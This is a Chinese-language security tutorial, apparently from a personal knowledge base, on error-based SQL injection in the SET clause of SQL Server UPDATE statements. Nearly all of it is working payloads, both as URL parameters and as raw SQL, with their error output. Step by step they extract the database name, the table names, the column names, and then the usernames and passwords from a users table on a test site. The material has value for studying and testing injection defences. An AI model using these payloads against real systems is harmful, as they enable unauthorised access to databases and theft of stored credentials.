0x01 前言

UPDATE-INSERT的爆错注入是一样的,这里演示的话,我就使用 UPDATE 注入演示了

UPDATE 的注入点一般就出现在两个地方

SET 处
WHERE 处

WHERE 处的注入与普通的注入是一模一样的
WHERE 处的注入可以查看我的知识库:web安全-数据验证不当/SQL Server 时间盲注
https://www.yuque.com/pmiaowu/web_security_1/ksym0w
https://www.yuque.com/pmiaowu/web_security_1/zs9l19

这里我们测试 SET处 的注入

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 爆库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=1&data=测试标题'+COL_NAME(1,db_name())+

数据库语句: UPDATE article SET title=’测试标题’+COL_NAME(1,db_name())+’’ WHERE id=’1’

  1. 1> UPDATE article SET title='测试标题'+COL_NAME(1,db_name())+'' WHERE id='1'
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'test' 转换成数据类型 int 时失败。

0x04 爆表名

注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段

查询不同的库可以这样

例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;

例如现在查询得是 test 库得表名

web语句: http://www.test.com/sql.php?id=1&data=测试标题'+COL_NAME(1,(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))+’

数据库语句:UPDATE article SET title=’测试标题’+COL_NAME(1,(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))+’’ WHERE id=’1’

  1. # 爆 1表
  2. 1> UPDATE article
  3. SET title = '测试标题' + COL_NAME(
  4. 1,
  5. (
  6. SELECT
  7. name
  8. FROM
  9. (
  10. SELECT
  11. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  12. name
  13. FROM
  14. test.dbo.sysobjects
  15. WHERE
  16. XType = 'U'
  17. ) AS a
  18. WHERE
  19. row_number = 1
  20. )
  21. ) + ''
  22. WHERE
  23. id = '1'
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。
  1. # 爆 2表
  2. 1> UPDATE article
  3. SET title = '测试标题' + COL_NAME(
  4. 1,
  5. (
  6. SELECT
  7. name
  8. FROM
  9. (
  10. SELECT
  11. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  12. name
  13. FROM
  14. test.dbo.sysobjects
  15. WHERE
  16. XType = 'U'
  17. ) AS a
  18. WHERE
  19. row_number = 2
  20. )
  21. ) + ''
  22. WHERE
  23. id = '1'
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'users' 转换成数据类型 int 时失败。

0x05 暴字段

注意:
OVER(Order by name ) 里面的 name 要修改为 test.dbo.SysColumns 表里面存在的一个字段

查询不同的表可以这样
例如:
Object_id(‘要查询的表名’)

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1&data=测试标题'+COL_NAME(1,(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1))+’

数据库语句:UPDATE article SET title=’测试标题’+COL_NAME(1,(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1))+’’ WHERE id=’1’

  1. # users 表字段名称
  2. 1> select name FROM test.dbo.SysColumns Where id=Object_id('users')
  3. 2> go
  4. +-----------+
  5. | name |
  6. +-----------+
  7. | id |
  8. | password |
  9. | username |
  10. +-----------+
  11. (3 rows affected)
  1. # 获取当前库 users表 第一个字段名称
  2. 1> UPDATE article
  3. SET title = '测试标题' + COL_NAME(
  4. 1,
  5. (
  6. SELECT
  7. TOP 1 name
  8. FROM
  9. (
  10. SELECT
  11. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  12. name
  13. FROM
  14. test.dbo.SysColumns
  15. WHERE
  16. id = Object_id('users')
  17. ) AS a
  18. WHERE
  19. a.row_number = 1
  20. )
  21. ) + ''
  22. WHERE
  23. id = '1'
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'id' 转换成数据类型 int 时失败。
  1. # 获取当前库 users表 第二个字段名称
  2. 1> UPDATE article
  3. SET title = '测试标题' + COL_NAME(
  4. 1,
  5. (
  6. SELECT
  7. TOP 1 name
  8. FROM
  9. (
  10. SELECT
  11. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  12. name
  13. FROM
  14. test.dbo.SysColumns
  15. WHERE
  16. id = Object_id('users')
  17. ) AS a
  18. WHERE
  19. a.row_number = 2
  20. )
  21. ) + ''
  22. WHERE
  23. id = '1'
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'password' 转换成数据类型 int 时失败。

0x06 爆内容

注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1&data=测试标题'+COL_NAME(1,(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1))+’

数据库语句: UPDATE article SET title=’测试标题’+COL_NAME(1,(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1))+’’ WHERE id=’1’

  1. # 查询users表 第一条数据
  2. UPDATE article
  3. SET title = '测试标题' + COL_NAME(
  4. 1,
  5. (
  6. SELECT
  7. CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
  8. FROM
  9. (
  10. SELECT
  11. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  12. FROM
  13. users
  14. ) AS a
  15. WHERE
  16. row_number = 1
  17. )
  18. ) + ''
  19. WHERE
  20. id = '1'
  21. 2> go
  22. 22018 - [SQL Server]在将 varchar '1 |test-user-01|123456' 转换成数据类型 int 时失败。
  1. # 查询users表 第二条数据
  2. 1> UPDATE article
  3. SET title = '测试标题' + COL_NAME(
  4. 1,
  5. (
  6. SELECT
  7. CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
  8. FROM
  9. (
  10. SELECT
  11. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  12. FROM
  13. users
  14. ) AS a
  15. WHERE
  16. row_number = 2
  17. )
  18. ) + ''
  19. WHERE
  20. id = '1'
  21. 2> go
  22. 22018 - [SQL Server]在将 varchar '2 |test-user-02|234567' 转换成数据类型 int 时失败。